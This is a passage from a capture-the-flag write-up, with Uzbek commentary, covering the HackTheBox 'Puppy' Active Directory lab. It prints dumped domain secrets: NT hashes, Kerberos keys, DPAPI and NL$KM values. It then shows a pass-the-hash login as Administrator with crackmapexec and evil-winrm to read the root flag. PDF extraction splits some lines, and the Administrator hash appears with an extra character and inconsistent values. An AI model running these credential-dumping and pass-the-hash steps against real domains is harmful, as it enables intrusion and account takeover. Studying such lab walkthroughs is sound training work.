PUPPY\DC$:aes256-cts-hmac-sha1-96:f4f395e28f0933cac28e02947bc68ee11b744ee32b6452dbf795d9ec85ebd
a45
PUPPY\DC$:aes128-cts-hmac-sha1-96:4d596c7c83be8cd71563307e496d8c30
PUPPY\DC$:des-cbc-md5:54e9a11619f8b9b5
PUPPY\DC$:plain_password_hex:84880c04e892448b6419dda6b840df09465ffda259692f44c2b3598d8f6b9bc1b0
bc37b17528d18a1e10704932997674cbe6b89fd8256d5dfeaa306dc59f15c1834c9ddd333af63b249952730bf256c3a
fb34a9cc54320960e7b3783746ffa1a1528c77faa352a82c13d7c762c34c6f95b4bbe04f9db6164929f9df32b953f0b4
19fbec89e2ecb268ddcccb4324a969a1997ae3c375cc865772baa8c249589e1757c7c36a47775d2fc39e566483d0fc
d48e29e6a384dc668228186a2196e48c7d1a8dbe6b52fc2e1392eb92d100c46277e1b2f43d5f2b188728a3e6e5f035
82a9632da8acfc4d992899f3b64fe120e13
PUPPY\DC$:aad3b435b51404eeaad3b435b51404ee:d5047916131e6ba897f975fc5f19c8df:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xc21ea457ed3d6fd425344b3a5ca40769f14296a3
dpapi_userkey:0xcb6a80b44ae9bdd7f368fb674498d265d50e29bf
[*] NL$KM
0000 DD 1B A5 A0 33 E7 A0 56 1C 3F C3 F5 86 31 BA 09 ....3..V.?...1..
0010 1A C4 D4 6A 3C 2A FA 15 26 06 3B 93 E0 66 0F 7A ...j<*..&.;..f.z
0020 02 9A C7 2E 52 79 C1 57 D9 0C D3 F6 17 79 EF 3F ....Ry.W.....y.?
0030 75 88 A3 99 C7 E0 2B 27 56 95 5C 6B 85 81 D0 ED u.....+'V.\k....
NL$KM:dd1ba5a033e7a0561c3fc3f58631ba091ac4d46a3c2afa1526063b93e0660f7a029ac72e5279c157d90cd3f61
779ef3f7588a399c7e02b2756955c6b8581d0ed
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb0edc15e49ceb4120c7bd7e6e65d775b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a4f2989236a639ef3f766e5fe1aad94a:::
PUPPY.HTB\levi.james:1103:aad3b435b51404eeaad3b435b51404ee:ff4269fdf7e4a3093995466570f435b8:::
PUPPY.HTB\ant.edwards:1104:aad3b435b51404eeaad3b435b51404ee:afac881b79a524c8e99d2b34f438058b:::
PUPPY.HTB\adam.silver:1105:aad3b435b51404eeaad3b435b51404ee:a7d7c07487ba2a4b32fb1d0953812d66:::
PUPPY.HTB\jamie.williams:1106:aad3b435b51404eeaad3b435b51404ee:bd0b8a08abd5a98a213fc8e3c7fca780:::
PUPPY.HTB\steph.cooper:1107:aad3b435b51404eeaad3b435b51404ee:b261b5f931285ce8ea01a8613f09200b:::
PUPPY.HTB\steph.cooper_adm:1111:aad3b435b51404eeaad3b435b51404ee:ccb206409049bc53502039b80f3f117
3:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:d5047916131e6ba897f975fc5f19c8df:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:c0b23d37b5ad3de31aed317bf6c6fd1f338d9479def408543b85bac046c59
6c0
Administrator:aes128-cts-hmac-sha1-96:2c74b6df3ba6e461c9d24b5f41f56daf
Administrator:des-cbc-md5:20b9e03d6720150d
krbtgt:aes256-cts-hmac-sha1-96:f2443b54aed754917fd1ec5717483d3423849b252599e59b95dfdcc92c40fa45
krbtgt:aes128-cts-hmac-sha1-96:60aab26300cc6610a05389181e034851
krbtgt:des-cbc-md5:5876d051f78faeba
PUPPY.HTB\levi.james:aes256-cts-hmac-sha1-96:2aad43325912bdca0c831d3878f399959f7101bcbc411ce204c37d
585a6417ec
PUPPY.HTB\levi.james:aes128-cts-hmac-sha1-96:661e02379737be19b5dfbe50d91c4d2f
PUPPY.HTB\levi.james:des-cbc-md5:efa8c2feb5cb6da8
PUPPY.HTB\ant.edwards:aes256-cts-hmac-sha1-96:107f81d00866d69d0ce9fd16925616f6e5389984190191e9cac1
27e19f9b70fc
PUPPY.HTB\ant.edwards:aes128-cts-hmac-sha1-96:a13be6182dc211e18e4c3d658a872182
PUPPY.HTB\ant.edwards:des-cbc-md5:835826ef57bafbc8
PUPPY.HTB\adam.silver:aes256-cts-hmac-sha1-96:670a9fa0ec042b57b354f0898b3c48a7c79a46cde51c1b3bce9a

Puppy 30
fab118e569e6
PUPPY.HTB\adam.silver:aes128-cts-hmac-sha1-96:5d2351baba71061f5a43951462ffe726
PUPPY.HTB\adam.silver:des-cbc-md5:643d0ba43d54025e
PUPPY.HTB\jamie.williams:aes256-cts-hmac-sha1-96:aeddbae75942e03ac9bfe92a05350718b251924e33c3f59fdc
183e5a175f5fb2
PUPPY.HTB\jamie.williams:aes128-cts-hmac-sha1-96:d9ac02e25df9500db67a629c3e5070a4
PUPPY.HTB\jamie.williams:des-cbc-md5:cb5840dc1667b615
PUPPY.HTB\steph.cooper:aes256-cts-hmac-sha1-96:799a0ea110f0ecda2569f6237cabd54e06a748c493568f4940f
4c1790a11a6aa
PUPPY.HTB\steph.cooper:aes128-cts-hmac-sha1-96:cdd9ceb5fcd1696ba523306f41a7b93e
PUPPY.HTB\steph.cooper:des-cbc-md5:d35dfda40d38529b
PUPPY.HTB\steph.cooper_adm:aes256-cts-hmac-sha1-96:a3b657486c089233675e53e7e498c213dc5872d79468f
ff14f9481eccfc05ad9
PUPPY.HTB\steph.cooper_adm:aes128-cts-hmac-sha1-96:c23de8b49b6de2fc5496361e4048cf62
PUPPY.HTB\steph.cooper_adm:des-cbc-md5:6231015d381ab691
DC$:aes256-cts-hmac-sha1-96:f4f395e28f0933cac28e02947bc68ee11b744ee32b6452dbf795d9ec85ebda45
DC$:aes128-cts-hmac-sha1-96:4d596c7c83be8cd71563307e496d8c30
DC$:des-cbc-md5:7f044607a8dc9710
[*] Cleaning up...

Topilgan hash administrator useriga tekshiramiz evil-winrm uchun

┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ crackmapexec winrm xx.xx.xx.xx -u 'administrator' -H 'bb0edc15e49ceb4120c7bd7e6e65d775b' -d PUPPY.HT
B
HTTP xx.xx.xx.xx 5985 xx.xx.xx.xx [*] http://xx.xx.xx.xx:5985/wsman
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been
moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM xx.xx.xx.xx 5985 xx.xx.xx.xx [+] PUPPY.HTB\administrator:bb0edc15e49ceb4120c7bd7e6e65d75
b (Pwn3d!)

Biz hash orqali evil-winrm bog’lana olar ekanmiz

┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ evil-winrm -i xx.xx.xx.xx -u administrator -H 'bb0edc15e49ceb4120c7bd7e6e65d775b'

Evil-WinRM shell v3.7

Puppy 31
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplem
ented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-co


mpletion

Info: Establishing connection to remote endpoint


*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir

Directory: C:\Users\Administrator\Desktop

Mode LastWriteTime Length Name


---- ------------- ------ ----
-ar--- 5/17/2025 9:56 PM 34 root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt


2ceb313f373dab54d3eb28e0ed2d6f762
*Evil-WinRM* PS C:\Users\Administrator\Desktop>

Puppy 32

You might also like